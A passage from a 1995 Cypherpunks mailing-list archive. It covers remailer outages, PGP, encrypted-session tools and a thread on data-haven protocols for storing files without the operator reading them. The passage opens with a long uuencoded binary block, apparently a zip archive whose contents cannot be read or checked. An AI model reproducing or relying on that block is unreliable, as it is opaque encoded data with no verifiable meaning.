M$'CF`CP)Z.I0.W"PP#5\DO/"ZJXHGE3AH7*=U%FBS):@;;UBNZY,H'BFPV," M5/A*D8"N(P\.T'$?B&I at 72_N'!BBZTSA@'8>AM#)\,8/0K8>(ER0LW9*8>;GXG MBQX_P$N3D`8$+S"MC9"V2U)&2\^$^Q]BJ(HCHIS,ULFP(P"Q/8/;Z.G9-?$: M1P&OL"EV887E at N.5^BX#K+ZL51*+ M.6-F=C*;M_+*0^B<**1(=)3,<07H$VGH^YLUGGP5"!=E4,8#E[)MD0[%E,9L MYG.=ILDF!'(T9;9IZVW)T%;.>%5+E*+4R;&SM=3%8G:)1Y,N58>0&I">JK:$ M3Y`I"3DF/Q/X6Q.U_3%/]C&6=R-@=-TI6LH4OQ#\^YUA1PISG"S@)^H-OKQ2 MD,L3N6D5G5%3\"(;ZFB\2\MQ$O/(?7R#B/4#G_:IG5H;";=#ZB*+^04SKMBC M!J)[6R'*@'8RZK$"4;TP*7A"AQIH[F^%)L+L)$F)'(-TZG$AUB&9&1MF81YK M/7A]ZIEYN`2<4L"3NZU<;K*^"?-<6LZWH,SDQM3GH4(1Z_%QV4F48;ZD4TIB MAO\SMK)B?';US.P<\`Q"N1JMA9HT:_T`I]9*3>+3B#EUZCV9 M*R,36UC'8LE)?J6W8K+MMRFIJ4CWJ/-MU4V)T-:)'-EH819\VNOJ[TIN32HUXZI,JJSF4E?.UC-79\=W44E MYTZ9%:R*\"/?<0VS)!O7,-5>M9A=N3[X'1E='@#:#^:L5$$`)"U5 MW"\]3%L at 0=X8G,M3R^&K??(^"!P939-Z50-&F4WRT5^JUZFM,4&KC2?Z&#A. MC+<-"J4$*9Y&D/1W`&[=]MZ.++( M_!%JT+(MCRG^7W[&(EJ&`O5]LUGM5$B64AGTS3!T75>6N M85CK:&D6C19U-#UP-X2EGSLMP8Z?+-!^H&G#5H=G at 4DV[2UNS1H\7IQOUQ37 MI%-L[XCI<-ZZ!#7+:ED!L at -\O.RQ>#KSTO*B@#@!>'E<^J"G>+OB%2D(T#%Y MR21&O.FP#H,Y.'*/^%3%BH8W^.8$?Z:!0IN[PAG%1/P%$WXC>9O3'2D3NC+] M:BDQ.40F6R+94/:ILM1U;)CYFH%2T,2<,GQBQ7MR*%@_8[@55@*L,KSSG5,] M6Z&G'Y#J/_Y:7OGI7T:G1NX77NIN. at 7$&7^S/%=[!OAO?*YE.&),E%S2+PRITOE6J5+H94PGSK=)E)8!*QY!ZR]%*DJ5![E6LX?KW;V=8Y%44WD,X22 M:T4:ZCTMR]/X5JMU^+!*$]I17V+'Q.38[HB'KVB59BR5/+J-!Q-M at O]*,K;%CY15%2%@?4\O!T M=0HE<_'RA>I)%.[KZ!>MYJI]@V4KH\6X7"ONWQ5@//UA5E?E\"1=[TEG%U=-3E;]&/CR1>;A"\%%V0V7Z<$V6X%TRGA^;/T)0C>**OX"T>? M\@!3B+!/K'#NQB$J3GQR8<5AX*&K>#B&W+5?&"#@B]GX3+;YA>P790^&H=C- ME&>7W3BBWH*\O*=XLAH%(::\7Y&ZV7?U,NB3;I8GQW4RF4WT(RVB_8@[T2&] M<2.\O5"\H&]\RD3[,(!HFS]L=2*EY2"D3S"[\EJJQD`SYVYJX:6`4>!&-$LA M?@TN at RN>Y0T!5K`"/R#PZCU(P"[8$5*VA#;FN(ENF)I53[/98AA>-T[>E#-M M[,75^6SX6R"68K:TU$`:W^K%%/KOXI`$/M1LX!(ORM MIMSUAV#!R#64D7/O487#'M$5%H at UBL4ZN>0/G8NJ^+IA_=8GP4I8@>GG`FI' M.UC. at 3@U2!Q2*P8VPX[>8YTPBV1 at O59@\;?30WY':V M*59"#"+VB*5D%Y0341+_KK*"J+`N&44)I_O$.^8)E"^8E['-%F6H`K6R MK%*:GS6AP_ECX\>NI[S^6RK:#XW<$ST90X0\^):T-,'J@[V\D;JA9+F%Q<@L M]U8L6(<7,XO1J?=DE9KNR;]6JU)/@2GA_YU at L9,\#EX`)L]]Y8/5#55-IL"P M$H&_7ZQY)$0M82H[X5\':XM4BAOHPACW/XHM^[;F*V^&N@[9-M_J/:6M'@IS MF=2NU+R\IZJOZ42_YCB+;V85EXSN*JJ7GKS*ZHI4FKR9DWQ>2*KOD'K8R M2?M0G4&9(BDZ29^77P;!;51X]T7YHE#HIO)'B6\E<6'NU(6UUA,,[M5:*1U0 ML/C?]JZ\NVWCB/_?]_H=8+4I29=D`?`4Y2/R(4>M+#FR':=)W18$(1$V23`$ M:5ON\=D[,[L+[`*[(*E*IM\+F,RS2&"OV6-F=F=_HRDS,=L,FJPH4CS7%\ET MUP;JKD7%YK$_X=%+L^2BY]+0*`-_\0]9#3#J;C,`V+KXGZU..XG_:;L4_ZO3 M<\KX7V7\SS(&4!D#:&?Q/VFC!97,+Q/_\\`0`'0W\3]O(@)HRR5='/K?BR.* M/6'%\&:SV:2FO'[Y]/STR:/C5R]UE9!VMH;A,B9 at IL`;X>`A7]LRN.B-?&+O MXK;%_UKYW^XE\M^U6VV4_RV8K*7\+^5_*?]+^;^S^-^P-*:02M=7`KZV^-^W M'=P[O!@%%U9>RS#+ZV]P(!,.T8"XCDH7'T"G9Z\H[&FZY^9TQW?,637A+=/3 M8`8+BCGIKU*?6`V#Q:[EO^NP^-^VV^IV7+>,_UW*_U+^E_)_Y_)?7(^^`?O? M(/YW(O\WLO]O5T4H3?2OY0.R'UV]FE//WY7\;W5QSY_)?]OMT?Y_JUW:_Z7\ M+^5_*?]W(/^9^'].,1AESUL44ML*?V;]'XB;30.L?O7D[(?#DWOWSY\^NW?_ MNV/XNU:WWJVF$PRWN`U%G^>'C\_/Z'S]Z;.Z13G4+4I<3],H M(O;D[/'A";D`_9AY(AR?I+PR;XAK`^O24 at 6R:3U36N'4Q[WZTFI_^^,@[Y#\ M7+#N5.(=NG6MX=_IV:N4A:<2#XM9F":[+J\VS*.09\8\!$.$5[S:(M6OYR#Q MG1^@8\6"@,3CU+ED'I%[B7&\G&+RK.XFKG>0[[^;\WVWJHK*&/P".F(-5YO< M[RVWAE6Q at Y=CF<-&&<[$;_<^P>]_]` M_:_ET/Y/QVF7^E^I_Y7Z7ZG_[6[_!QV('\M^^@P.<\L-(/FF+%8572`X"Q!I MC.7HY]"5?.C;BT4TM1RWCQ7HV\SOH2Y=EH4U6P!V1C#TK-X^076BCK2*5WA+ M at UPX@U':@@_>9,6!RG2W#K3A8%)XHBQ^I[AU!BM>'4SW>L6IU"LN4`NH#=0! MZE:L`WRC8=L])56E!T_[0/M`-E`#Z'ZE;MM]H'U*U6_83D=-]0N\]1$H`%H` M+8&N@%9`(97E=!L at 2]14$3R=`_T,]!;*<%IUK'7%@^\QI7+;#1`_:JH1/+T` MN at 0:`[T#>@\T`3J at 5"T74NVKW("Q5/EGA>7_-WCS,]`G(!_H`Z5J`S?:&6X, MX>D,:`J$_S6!_L1SN(=PO>7QHGW M!)X>`3T#^@[HST!_`3H!&I at F7F4/GOZ73YE_P]\_`?T(]!CH!^/$>P1/3X&> M`]T#>@#TL"(/FG+B_?HF'M[.L=9./&UV+=LP\?)O.O2OPW(R3#S;@:*!P0?YMI,E03-HOI*)5Y"JG'@W/?%2X#;3 MY%,4QX:B:N*:2-WB0+?TU52R#7V&HVF]9&F`XFAZDD M6CP!/Q+.?:9#:4%-6:FYCLA`\N^QU`_2>">"2;W>F(9-O\W^[;7XO^R[\FJ' M/^JR?]U.)UM:]6Z-[%PPEX),NX2]QBOT))@\(`,^\E-]JEW11B[J;6&5MDEF;M at MGKI^\R*OK+BJW at 93)MF#J?W_O2,EVZ* M9P8#3ZG;_PGI,N(M;OZM/__MM+HN[?^UVR"-VNC_;7=[I?]7N?]7[O^5^W^[ MV_\[!'$Y"QL""0D;>SQ#_^/K[_]Y&!DG#O$FU%X<^"MHPM5>!C^/^#:DEJ&@ M]V#8("X9B)U4EJ2WPWDTGO1LKPJ,^A".<,\/AY4WA^_S18A"A[-0DDDX!5CI M;(^0T!5H,(D":LTT)K4(TJV+24T2-8*:./T*GF,DPFC[#5!^2R$QCBR$S7K`-_[]N@\\!(P%($U<;9: M\)\I_RN,([K`NV@>LEV/49#7;BA_+'&0`][#T`>.OO[.PP)4-\C-R=2?0H+R M!DCU%S\G]??Q!P&+H8%%8ZJ[JRA,#+0'6W?'JOYTA,-SA,NL1S`M-=%`1]]` M5]]`=TT#7=8NVQUH`3D4,!%+"HTM\$08ZI`!1R;DP)=4T.#_C"0-C73LL:Z1 M\//#`MSTHW1TB>ZYC'`Z\M_7E.GHRW2*RTQ'A%JF^+VX4+NC[\W.PZ((VD=V MA_=F9Y`#AT%L&?]3DBU5*29P2(2<08U$!SDB,->&G_*H;T/M^VQ6*/@Q!P)6 MTHIFICDA$$PR!0D$%7U9'*+I["CA%V,8 at C-950EPLO80S1%=%EKF"!DH2B]D M4#+(SU2^LVE$:%WIXH-H at 8N/B"3G3;".`=[*J9FRU0#*(,"FF%*=00&J;/;! M++CDBX62XVJ&8%F7L_`S+#8B=&H=@6*!BT5+5UZ8,)R8TNCD^+%L*ID+S-MR)@0X+2*P%2]# M:X,/HL.^A^4&@<./0=_"2\,4LNTH6G`#28:S-H%J4T[/0*N at KV<7W^O50]FE M=%-@['?\VI14JX)@$]F,%01M9OX9\;.Y[RHZ"3T;%.%GLS;730A^%QN.M8V! M`8OB,63'CQ[F+]FQ;S#317)SCEF(O^VC1EY_ADE6U>W-L-1$,Y6X\13;]0P0 MACXTX#CFL)SKX$?7@@5CE!-B"XY\.>?!QK.)V at N_<>#8-,N!LO&DJ\]MSPFE MPTW0ETS at L&`'BIRAC1#KAJ<#]QHL:*P8O<]XQ,HCMA^C?%T'$,_[+M=URJZ/ M at 6_9@C1\2PS37Y7]1W#84V^^0_NOW>JD]S\)"Q+LOVYI_Y7V7VG_E?;?[NR_ M'#F.G?K%5C5>XT1U; ME]XTB&N\L$7PRRI8#QG"'3Z6JR#!$I,5M+T];.@>5O!S ML(B*XX)+%4HVY-&NA[[`^IJ!].6HJ2\X/U/0=XQ*[X^]V67`N`YU:3B:G?)H MR9O"(T#RG&23%A4C]+T2'<[C+/D3WEK4`ZD#S!%:F.:4'35R?"X^:T5D<:@N MV__'NZ+T/LQT2-M at B:$Z8KK"+%A82J"@8H7QQ0(2'T*F0I-+?I!51B..EZSU M^['Y^ MIDZ=%C`<%%U3PN&M>+HUK3O_[4Z+W?]ME?@OI?Y?ZO^E_O]UZ/\\@"T6 MQ:/KL7![%*=D[5R0KO_BP,2`.^$TG&"D*ZQ^%`?,EPJ4;I"CYQ(>VJMP&BQL M/90;?MKV6/8PH]?YQ27MZRWE=::+L+""UO'Y][9%&5C7UD4.K.K0H^AJ;$S. M_24UH%I+7#=PY!/OFGXJP^>7<\MM=ILNK`ZKA0\&$,5?]?/-%^J>>5]=WENW ML at X[JH.0.2QD)FY04:2E?(EZ-QQSP&8ID*(XU$3[XL+0X_%X MH4WA&!J1OKW1`/DRC=AFP="/P-Y&B-3I^/%RH[$PZ6:#4LZTMPE&=L'HE+M* MSG?XZ0;67'Z"=JT5-TULKHSLX:@71VC3IV_\]CB]A6FV#?F*HCC'GY/>BNG?_AR'6'D,_(J_/D)WJ-2Z0XJ:P@:U?T5C]?3Z\UL0,MQ;^0AJ,CMSC4/U!^DIQCVE% M<#@S=]@DPK55+LN<@XFK9@=\4VQUW4+`_$+,/:=,J;M]W91Z-_/XAOWAZ-TJ M7CX&PW)I7%.V*TO-=,`;J&4J[2CGUDQ9_,BK)3/L<..6]6:#I<'2K6L:=LR" MC6:!,.VG7C@#JW^&`;Y8(7&`+OKAA.T?32)OI`Q1$;=+NL3&C/=TQ.'MM3`B MLYB'5P\_H\5#6R7,B[^.9UL739)\4L*A:0]? M]RL_6H&Z8OY#FI[2EZRI?60RLDW^.&MF,1_+NA+E$Q+9>TDZ3EIN.:;EP1LN M*W&*L>99EU$TLL)1X"'W/X9S97^'&/T1CS=PFQ+W;`R')%R`X_#0_`-CD$ M,QR$I7.PH+-UE2YOXY2?\E-^RL\N/_\#4$L!`A0`%``"``@`=S//&@M(9P<% M&P``D4<```<``````````0`@`````````&-O<'EI;F=02P$"%``4``(`"`!Y M`2X>+45;!A0*```%&```"P`````````!`"`````J&P``:V5Y:&%N9"YT>'10 M2P$"%``4``(`"``1G2T>]PY^DK<%````,```"P`````````!`"````!G)0`` M='!AJG\\`/DG````\```#``````` M```!`"````!'*P``:V)I Message-ID: <9501132038.AA17540@toad.com> > > Not to be paranoid, but did anybody receive that program? > > Does cypherpunkcs at toad.com have a pgp key? > > I think it was intercepted. > > mike > Yep, and I've already got a couple of other like it from other sources. I also posted a semi-solution to the problem. If it doesn't show up, let me know and I'll repost it. PGP Key available on request, or try keyservers (ID = 0xab1f4831) Rob From jya at pipeline.com Fri Jan 13 12:47:29 1995 From: jya at pipeline.com (John Young) Date: Fri, 13 Jan 95 12:47:29 PST Subject: NYT on MS Online Latest Message-ID: <199501132046.PAA07929@pipe3.pipeline.com> Peter Lewis writes today on latest MS Network online mighty joes, palming Uunet for hi-speed hookup and Mosaic and Spyglass for joetoe-jam web-peddling. See it by sending blank message with subject: NEB_wet From dmandl at bear.com Fri Jan 13 13:02:01 1995 From: dmandl at bear.com (dmandl at bear.com) Date: Fri, 13 Jan 95 13:02:01 PST Subject: Remailer@jpunix.com down!!!??? Message-ID: <9501131702.AA06825@yeti.bsnet> > From: "Joshua M. Sled" > Subject: Re: Remailer at jpunix.com down!!!??? > > On Fri, 13 Jan 1995, Samuel Kaplin wrote: > > > I just read that the remailer at jpunix.com went down suddenly and > > permanently. Anyone know what happened?? I also believe the whole site is > > down as it didn't answer my pings a couple of days ago. > > He was getting spam from AOL at the rate of 25 messages every 5 > seconds... so he took the system down. I missed the specifics of this the first time. How was the spammer doing it? Obviously he wasn't chaining his mail, or there'd be no way to know he was from AOL. Was JP unable to determine the guy's actual address? Or was he posting in the clear sans anonymity? Sorry if this has been covered already. I remember seeing the incident mentioned, but I can't recall the explanation of why JP was powerless to do anything about it. Thanks. --Dave. From lmccarth at thor.cs.umass.edu Fri Jan 13 13:47:10 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Fri, 13 Jan 95 13:47:10 PST Subject: retiring my remailer.. (fwd) Message-ID: <199501132146.QAA13046@thor.cs.umass.edu> Forwarded message: From wcs at anchor.ho.att.com Fri Jan 13 14:06:27 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Fri, 13 Jan 95 14:06:27 PST Subject: Multiple symetric cyphers Message-ID: <9501132200.AA00870@anchor.ho.att.com> > Actually, a slight correction. PGP does have an algorithm byte > for the encryption algorithm; this byte is inside the RSA block. It's got another algorithm byte - the stuff at the beginning that says --- BEGIN PGP ENCRYPTED MESSAGE ---, letting everyone know it's PGP. That's one of the major risks of "algorithm bytes" - not that it tells the Bad Guys which algorithm you're using, but that it tells them "yes, this is crypto, not just noise". Bill From sdw at lig.net Fri Jan 13 14:33:00 1995 From: sdw at lig.net (Stephen D. Williams) Date: Fri, 13 Jan 95 14:33:00 PST Subject: State of PGP dll?; Encrypted session projects In-Reply-To: <9501132200.AA00870@anchor.ho.att.com> Message-ID: What is the state of the Windows/.dll PGP libraries? Does anyone have a usable version yet? I've been thinking of trying to wedge pgp/encrypted session ability into some of the socket proxy programs out there. For Windows: twnsck12.zip, which is simple, is GNU, and has source and by writing a relatively simple windows serial terminal emulator and using Comt ($15 or 25 shareware) to convert it to a telnet client. Both of these could be modified fairly easily. I think Twinsock (Troy's winsock, twnsck12.zip) would be the first to work on, since it would cover whatever clients you would want to use. It also should tunnel through multiple telnets since by default it escapes just about everything. Term would be a good Unix-Unix equivalent target. Does anyone have better ideas? Any suggestions on login/key exchange sequence? sdw -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From mattt at microsoft.com Fri Jan 13 16:03:53 1995 From: mattt at microsoft.com (Matt Thomlinson) Date: Fri, 13 Jan 95 16:03:53 PST Subject: FW: How do I know if its encrypted? Message-ID: <9501140004.AA21059@netmail2.microsoft.com> ---------- From: To: Matt Thomlinson Subject: Re: How do I know if its encrypted? Date: Friday, January 13, 1995 12:27PM At 9:35 AM 1/13/95, Matt Thomlinson wrote: >make "handful of plaintext" - > "hash of the plaintext" and you've got >yourself >a decent system. :) > >(this way, alice can keep a hash of the plaintext, hash of the ciphertext, and >a key around for recovery, without keeping ANY plaintext. Also, for someone >to request the data, knowing part of the message won't work; now they've >got to know the entire message to recreate the hash. That would be a little more secure, but I'm thinking that the "handful of plaintext" would be a random number of some kind that the user prepends to the file before encrypting. This is kinder on the data haven's CPU; compare even 3DES of, say, 256 bits to IDEA of a few megabytes followed by MD5 of same. Plus, it offers the operater even more deniability: he doesn't even look at the whole file, but just enough to be sure that it's what it's supposed to be. Presumably, the data haven will specify how much a handful is, and offer a client program that generates all this automatically. >matt You sent this to me privately, so that's how I'm replying. If you don't mind, though, please forward this on to the list. b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From jsled at eis.calstate.edu Fri Jan 13 16:23:28 1995 From: jsled at eis.calstate.edu (Joshua M. Sled) Date: Fri, 13 Jan 95 16:23:28 PST Subject: C'punks slogan? Message-ID: Mostly because I'm looking at having bumper stickers made, and partly because I'm testing a procmail script :), I want a few suggestions for a good slogan for the C'punks, something that would look good on a bumper sticker... stuff I've come up with so far is like: sub rosa - Cypherpunks 1995 Support your local Cypherpunk Privacy isn't a crime (I think I stole that from somewhere) Ensuring privacy isn't a crime And that's about it.... you should see by now why I'm asking. :) Joshua M. Sled From pstemari at erinet.com Fri Jan 13 17:21:29 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Fri, 13 Jan 95 17:21:29 PST Subject: How do I know if its encrypted? Message-ID: <9501140112.AB29647@eri.erinet.com> At 09:17 PM 1/12/95 -0600, Larry E wrote: > ... > (1) the people who use the remailer, who get a measure of > comfort from knowing their communication is secure They know it's secure because they made it secure. If they don't care, I don't particularly see why the remailer should care. > (2) legal groups etc. who may try to hold the remailer > liable in some way for what passes through their remailer. It strikes me that this is a very weak defense. Legal beagles will probably argue that the remailer should have either prohibited encrypted communications or else was in collusion with the sending party. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From lmccarth at thor.cs.umass.edu Fri Jan 13 17:30:24 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Fri, 13 Jan 95 17:30:24 PST Subject: C'punks slogan? - Private Replies s'il vous plait In-Reply-To: Message-ID: <199501140130.UAA26305@thor.cs.umass.edu> Joshua M. Sled , writes: > Mostly because I'm looking at having bumper stickers made, and partly > because I'm testing a procmail script :), I want a few suggestions for a > good slogan for the C'punks, something that would look good on a bumper > sticker... Lest we suffer a recurrence of the C'punks Logo thread, which generated a whole raft of list traffic which would have been better kept private, please reply directly to Joshua and not to the whole list. [He seems to imply that he wants private replies ("testing procmail") anyway, but I want to encourage this practice explicitly.] Thanks -L. Futplex McCarthy From eric at remailer.net Fri Jan 13 18:00:08 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 18:00:08 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501140158.RAA03820@largo.remailer.net> From: Ben.Goren at asu.edu That of the data haven operator being able to deny knowledge of the contents of files people send him. He'll only return files that, when operated on by a strong cryptographic algorithm, make sense. This idea doesn't work for the purpose intended. I'll upload straight ASCII. When you ask for an decryption key, I'll make one up randomly, apply the decryption algorithm to the flat text, and send that back to you as a confirmation. The real question is "Makes sense to whom?". You can't enforce a requirement of encryption, but you can make sure that you can't make sense of most of it. As best I can tell, none of the previous suggestions guarantees that the file is unreadable. You don't need a guarantee of unreadability. What is needed is a presumption that files were not read. If they are unreadable, then they weren't read, but there are other ways of creating that assurance. Eric From Ben.Goren at asu.edu Fri Jan 13 18:17:34 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Fri, 13 Jan 95 18:17:34 PST Subject: How do I know if its encrypted? Message-ID: At 6:58 PM 1/13/95, Eric Hughes wrote: > From: Ben.Goren at asu.edu > > That of the data haven operator being able to deny knowledge of the > contents of files people send him. He'll only return files that, when > operated on by a strong cryptographic algorithm, make sense. > >This idea doesn't work for the purpose intended. I'll upload straight >ASCII. When you ask for an decryption key, I'll make one up randomly, >apply the decryption algorithm to the flat text, and send that back to >you as a confirmation. >[. . .] Damn. I hate it when I overlook the obvious. Still, I'd like to think there's an answer. Perhaps I'll keep thinking on it. >Eric -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From chen at intuit.com Fri Jan 13 18:33:06 1995 From: chen at intuit.com (Mark Chen) Date: Fri, 13 Jan 95 18:33:06 PST Subject: NIST Key Certification Document Message-ID: <9501140231.AA11480@doom> At the RSA conference, I came across an interesting-looking tome called _Federal Certification Authority Liability and Policy: Law and Policy of Certificate-Based Public Key and Digital Signatures_. It seems that we can obtain this thing from NIST for a modest fee of $61, but I'm wondering if there might be an online version around somewhere. Does anyone know? -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From blancw at microsoft.com Fri Jan 13 18:44:02 1995 From: blancw at microsoft.com (Blanc Weber) Date: Fri, 13 Jan 95 18:44:02 PST Subject: Reefer madness Message-ID: <9501140244.AA29812@netmail2.microsoft.com> Thanks for your replies about the Turkish prison films, and all, I think I comprehendo now. I did see the movie Airplane, but I somehow overlooked that salient point. Blanc From daleh at ix.netcom.com Fri Jan 13 19:00:20 1995 From: daleh at ix.netcom.com (Dale Harrison AEGIS) Date: Fri, 13 Jan 95 19:00:20 PST Subject: How do I know if its encrypted? Message-ID: <199501140259.SAA13236@ix3.ix.netcom.com> You wrote: > >Fine. The operator has no idea of how to make sense of this data >format. Just because someone in the world has an interpretation for >it doesn't mean that I do. > The primary point that I'm trying to make is that there is no such thing as an algorithmic test for a dataset being in a 'state' of encryption. Such a test is beyond alogrithmic capability (at least in our universe). Therefore, an RM/DH operator should just drop the pretense of filtering out non-encyphered submissions. Just take what comes and tell customers that if they don't want you to read it, it's up to _them_ to make certain that you can't. Period! The DH operator could encypher all submissions with his own key so that the DH contents can't be compromised to outsiders. This seems to be a much more real-world approach to the problem than tilting at windmill with encryption filters. (The previous examples were an attempt to demonstrate, in a concrete way, the failure of any such algorithmic approach. Whatever encryption-test algorithm you come up with I guarentee you I can defeat it!) Dale H. From dcwill at python.ee.unr.edu Fri Jan 13 20:23:50 1995 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Fri, 13 Jan 95 20:23:50 PST Subject: How do I know if its encrypted? Message-ID: <199501140428.XAA14570@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > From: daleh at ix.netcom.com (Dale Harrison (AEGIS)) > Paco begins by > inventing the new [format] of which only Paco knows the internals. Eric Hughes replied: > No operator of any data service can be expected to know about every > data interpretation. The key here is "good faith". An operator can > undertake a good faith effort to remain ignorant about content. While this may be possible, the argument that someone actively tried to remain uninformed about something "dangerous" or potentially "illegal" doesn't seem like a particularly strong defense. Someone with proper credentials might want to comment on whether intentional ignorance is sufficient to avoid culpability. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxdS6yoZzwIn1bdtAQHHYQF/Qe+7AcXH5ub+BMEY91hjbKNwGGUEho5o CN63jwJ4NQYBcLHwhhu9Q+b1wTE9hMrB =lSSE -----END PGP SIGNATURE----- From jpb at gate.net Fri Jan 13 20:38:20 1995 From: jpb at gate.net (jpb at gate.net) Date: Fri, 13 Jan 95 20:38:20 PST Subject: How do I know if its encrypted? Message-ID: <199501140437.XAA14922@hopi.gate.net> I accidentally sent a reply to Ben's letter solely to him. He responds here to the major points I brought up. I'm forwarding it here with his permission. Ben's text begins At 8:11 AM 1/13/95, jpb at gate.net wrote: >Ben.Goren at asu.edu said >> Here's a solution: >> >> Alice sends a file to Dave's DataHaven. When Alice wants her file back, she >> sends to Dave a secure hash of the file, a key with which to decrypt it, >> and a handful of plaintext at the beginning of the file. Dave decrypts the >> file that matches the hash with the key Alice gave him; if the file begins >> as Alice says it should, Dave returns the file to Alice. > >If Alice initially encrypts the file to herself, and then encrypts it to Dave >(Dave doesn't accept non-encrypted files), Dave doesn't need to decrypt it. >If Dave even *can* decrypt it, and makes a policy of decryption, he is >setting himself up for legal liability. > >Dave should allow anyone who can provide the MD5 of the cyphertext, the >fileid and the fee to retrieve the file. Retrieval requests will of course >also require a pgp key to encrypt the file to and a anonymous remailer block. I address this somewhat further in a response to Eric Hughes on the list. Basically, Dave wants to make sure that he can't see what's in the file. My scheme guarantees that the file is unreadable to anybody but the owner until the owner asks for it back. If return of the file is automated, Dave'll never know what's in it. Alice should, of course, further protect her data if she feels the need. >> This way, only those people who have an intimate knowledge of the files can >> recover them. > >I agree that this is a good thing to enforce. > >> Dave can have a policy whereby he deletes a file after returning it, unless >> Alice pays more to keep it there. Thus, Bad Bobby can send his naughty >> pictures to Dave, tell the 'net how to get them--but the first person who >> neglects to include the fee to leave the pictures there winds up blocking >> out everybody else. Similarly, Samaritan Sam could get into a spending war >> with Bobby. Each time Bobby sends Dave his smut, Sam retrieves the file >> without paying for its continued storage--and takes a sneak peak at the >> pictures before deleting them himself. > >This is a bad policy for Dave from a financial point of view. If Alice pays >for a 30 day storage, it should stay there for 30 days. This means that Dave >also needs to require an owner-password when the file is initially stored, >but that is no big deal. Change the payment structure a little and you don't have those worries. Alice doesn't pay for thirty day storage, but rather pays for at least thirty day storage. If she thinks she'll be getting the file back in fifteen days, she only pays for that long. If she needs it for longer than that, she sends another payment before the file expires. >In a perfect world, Alice could specify an extra retrieval charge over and >above Dave's, and the DH would enforce this and pass the extra money on to >Alice. This would allow for information sale when neither party trusts the >other - Alice and Bob can agree on a fee for the file through anonymous means, >and once it is set, Bob can send in the cash and be sure the file will be >sent. That's the job of a data broker, not a data haven. Dave might well wish to offer that service, too, but, if I were him, I'd keep the two obviously separate. >Whether or not the file is what it is advertised to be is a whole >new problem that can't be solved securely in software. Not without an awfully good AI.... From ben at Tux.Music.ASU.Edu Fri Jan 13 21:06:55 1995 From: ben at Tux.Music.ASU.Edu (Ben Goren) Date: Fri, 13 Jan 95 21:06:55 PST Subject: How do I know if its encrypted? In-Reply-To: <199501140428.XAA14570@bb.hks.net> Message-ID: OK. If this isn't the solution, it at least makes it past Eric's last objection. Alice hashes her file and uses that hash as the key to encrypt the file. She sends the file to Dave, and sends the original hash when she wants it back. Dave decrypts, and confirms the hash. Unfortunately, this still doesn't quite close the loop--Dave knows the contents of the file once Alice sends the key. It does, however, make it very difficult for Dave to know anything about Alice's file. In a real-world implementation, Dave is going to want to get the file back to Alice as quickly as possible, since that's part of what she's paying for. Scanning the file as it leaves will slow down delivery--especially if it's "suspicious" and must get routed to a human--so it's uneconomical for Dave to do anything until later. Once he's returned the file, the deed has been done, and it does little good to know that Alice was hoarding plans to build a nuke, as she's got them back again--the cat's out of the bag. b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From pstemari at erinet.com Fri Jan 13 22:08:55 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Fri, 13 Jan 95 22:08:55 PST Subject: How do I know if its encrypted? Message-ID: <9501140600.AA07244@eri.erinet.com> At 10:07 PM 1/13/95, Ben Goren wrote: > ... Alice hashes her file and uses that hash as the key to encrypt the file. >She sends the file to Dave, and sends the original hash when she wants it >back. Dave decrypts, and confirms the hash. > >Unfortunately, this still doesn't quite close the loop--Dave knows the >contents of the file once Alice sends the key. It does, however, make it >very difficult for Dave to know anything about Alice's file. ... This seems overly complicated. If Dave has a known public key, then Alice should be able to hash her file, sign the hash, encrypt (the hash, her public key, and the file) with Dave's public key, and (anonymously) sends the result to Dave's (encrypted) address. Dave then decrypts, verifies the sig, and stores the file, hash, and PK together, indexed by the hash. When Alice wants the file back, she signs (the hash and her encrypted return address), encrypts the result with Dave's key, and sends it off. Dave decrypts the request, fetchs the public key based on the decrypted hash, verifies the signature, encrypts the file with Alice's provided public key, and sends it back to the encrypted return address. To avoid Dave's knowing the file contents, Alice can encrypt it before the described protocol and decrypt it afterwards. The protocol is subject to a replay attack, but the result of the replay would cause the file to be sent to the original sender and not to the replayer. The signed hash in the first step prevents people from spamming Dave with files that have Alice's public key. Alice only requires an encrypted address and public key for Dave, and Dave validates the retrieval request against the public sent in the first step. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From raph at netcom.com Fri Jan 13 23:00:33 1995 From: raph at netcom.com (Raph Levien) Date: Fri, 13 Jan 95 23:00:33 PST Subject: Draft of editorial to SF Chronicle Message-ID: <199501140623.WAA14448@netcom4.netcom.com> Chaos and Anonymity keep the Internet Vital I could not let Martha Siegel's editorial ("Anarchy, Chaos on the Internet Must End", 2 Jan 1995) go unchallenged. To the uninformed reader, her arguments may seem plausible. However, her distortions give a picture of the Internet quite at odds with the true nature of the Net. Her views are by no means representative of those who actually use the Net. Of the dozens of messages I saw in response to the editorial, not a single one was in favor of her proposals. As Ms. 